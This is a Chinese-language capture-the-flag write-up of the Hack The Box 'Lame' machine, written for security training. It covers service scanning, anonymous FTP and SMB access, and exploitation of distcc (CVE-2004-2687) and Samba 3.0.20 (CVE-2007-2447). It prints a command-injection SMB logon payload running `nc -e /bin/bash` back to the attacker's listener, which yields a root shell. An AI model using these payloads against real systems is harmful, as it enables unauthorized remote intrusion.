Skip to content

Lame Writeup

聲明
我只是個初學者。 Please correct me if I'm wrong.

這臺很lame。 

Lame Badge

靶機資訊(Machine Infromation)

Machine Description
Name Lame
OS Linux
Difficulty Easy
Author ch4p

情蒐(Reconnaissance)

服務掃描(Services Scan)

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 01:37 EST
Nmap scan report for 10.129.69.61
Host is up (0.29s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.19
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-02-22T01:38:12-05:00
|_clock-skew: mean: 2h30m11s, deviation: 3h32m10s, median: 9s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.13 seconds

從結果可知:
1. FTP可以anonymous登入
2. 沒有Web App,所以針對既有服務攻擊 -> 查版本有沒有CVE

FTP - Port 21

Anonymous login

雖然可以登入,但是什麼都沒有。

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ ftp 10.129.69.61
Connected to 10.129.69.61.
220 (vsFTPd 2.3.4)
Name (10.129.69.61:xavier): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

SMB - Port 445

Anonymous login

也是可以登入,但是唯一可以讀寫得/tmp下什麼都沒有。

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' --shares                          
SMB         10.129.69.61    445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.129.69.61    445    LAME             [+] hackthebox.gr\: 
SMB         10.129.69.61    445    LAME             [+] Enumerated shares
SMB         10.129.69.61    445    LAME             Share           Permissions     Remark
SMB         10.129.69.61    445    LAME             -----           -----------     ------
SMB         10.129.69.61    445    LAME             print$                          Printer Drivers
SMB         10.129.69.61    445    LAME             tmp             READ,WRITE      oh noes!
SMB         10.129.69.61    445    LAME             opt                             
SMB         10.129.69.61    445    LAME             IPC$                            IPC Service (lame server (Samba 3.0.20-Debian))
SMB         10.129.69.61    445    LAME             ADMIN$                          IPC Service (lame server (Samba 3.0.20-Debian))
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' -M spider_plus --only-files -o READ_ONLY=false   
SMB         10.129.69.61    445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.129.69.61    445    LAME             [+] hackthebox.gr\: 
SPIDER_P... 10.129.69.61    445    LAME             [*] Started spidering plus with option:
SPIDER_P... 10.129.69.61    445    LAME             [*]        DIR: ['print$']
SPIDER_P... 10.129.69.61    445    LAME             [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.129.69.61    445    LAME             [*]       SIZE: 51200
SPIDER_P... 10.129.69.61    445    LAME             [*]     OUTPUT: /tmp/cme_spider_plus

┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ batcat /tmp/cme_spider_plus/10.129.69.61.json 
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────
    │ File: /tmp/cme_spider_plus/10.129.69.61.json
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────
1   │ {
2   │     "tmp": {
3   │         ".X0-lock": {
4   │             "atime_epoch": "2024-02-22 01:34:29",
5   │             "ctime_epoch": "2024-02-22 01:34:29",
6   │             "mtime_epoch": "2024-02-22 01:34:29",
7   │             "size": "11 Bytes"
8   │         },
9   │         ".X11-unix/X0": {
10   │             "atime_epoch": "2024-02-22 01:34:30",
11   │             "ctime_epoch": "2024-02-22 01:34:29",
12   │             "mtime_epoch": "2024-02-22 01:34:29",
13   │             "size": "0 Bytes"
14   │         },
15   │         "5619.jsvc_up": {
16   │             "atime_epoch": "2024-02-22 01:35:17",
17   │             "ctime_epoch": "2024-02-22 01:35:17",
18   │             "mtime_epoch": "2024-02-22 01:35:17",
19   │             "size": "0 Bytes"
20   │         },
21   │         "vgauthsvclog.txt.0": {
22   │             "atime_epoch": "2024-02-22 01:33:59",
23   │             "ctime_epoch": "2024-02-22 01:33:59",
24   │             "mtime_epoch": "2024-02-22 01:34:00",
25   │             "size": "1.56 KB"
26   │         }
27   │     }
28   │ }
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────

CVE-2011-2523 - vsftpd 2.3.4 Backdoor

kaliearchsploit查找找已知CVE:

Terminal
┌──(xavier㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4                   
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                           | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)              | unix/remote/17491.rb
-------------------------------------------------------------------- ---------------------------------

CVE內容

2011年的7月,來自官方網站的vsftpd執行檔被發現異常,該版本(2.3.4)被植入後門,導致任何使用者名稱結尾是笑臉:),都可以在port 6200取得shell。

但沒用,因為連不到6200,被防火牆擋了。怎麼知道的?待會說。

CVE-2004-2687 - DistCC Daemon - Command Execution

除了kaliearchsploit,你也可以直接用Metasploit直接戳distcc:

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ msfconsole 
msf6 > use exploit/unix/misc/distcc_exec 
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 10.129.69.61
RHOSTS => 10.129.69.61
msf6 exploit(unix/misc/distcc_exec) > check
[+] 10.129.69.61:3632 - The target is vulnerable.

Exploit

結果也是有弱點的版本,可RCE1,取得user.txt

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uname -a
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /home/makis/user.txt
9b6248858e31130017045acc97e586c3

在這之後利用smb上傳binary,打算另建服務和打proxy,但都失敗,看了一下netstat、其他服務才發覺有防火牆。

本階段其他嘗試

開很多服務,但一開始都沒有掃到=>防火牆。

netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:56485           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:47718           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:47602           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.129.69.61:53         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:54618           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0   2048 10.129.69.61:44118      10.10.14.19:8787        ESTABLISHED on (0.48/0/0)
tcp6       0      0 :::2121                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::3632                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::53                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::5432                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:953                 :::*                    LISTEN      off (0.00/0/0)

SSH等字典檔攻擊就不詳列了。

CVE-2007-2447 - kaliamba "username map script" Command Execution

直接網搜:kaliamba smbd 3.0.20,就會在exploit-db找到Metasploit腳本,移至腳本最下方得知RCE方法與使用者帳號有關。

Metasploit腳本

Payload
"/=`nohup <COMMAND>`"

在登入的時候加上payload:

Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ smbclient //10.129.69.61/tmp -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.19 8787`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> SMBecho failed (NT_STATUS_HOST_UNREACHABLE). The connection is disconnected now

等reverse shell連來,就可以取得root:

Terminal
┌──(xavier㉿kali)-[~]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.19] from (UNKNOWN) [10.129.69.61] 47408
id
uid=0(root) gid=0(root)
cat /root/root.txt
0321c9e1cf74f79997eb79644863a347

至於為什麼用nc而不使用bash的reverse shell?因為連不會來啊。可能是我打錯吧。

後記

Lame是HTB的第一台靶機,主要目的是讓練習濫用已知漏洞。
靶機OS版本很舊,應另有提權途徑。


Last update: 2024-12-23 Created: 2024-02-25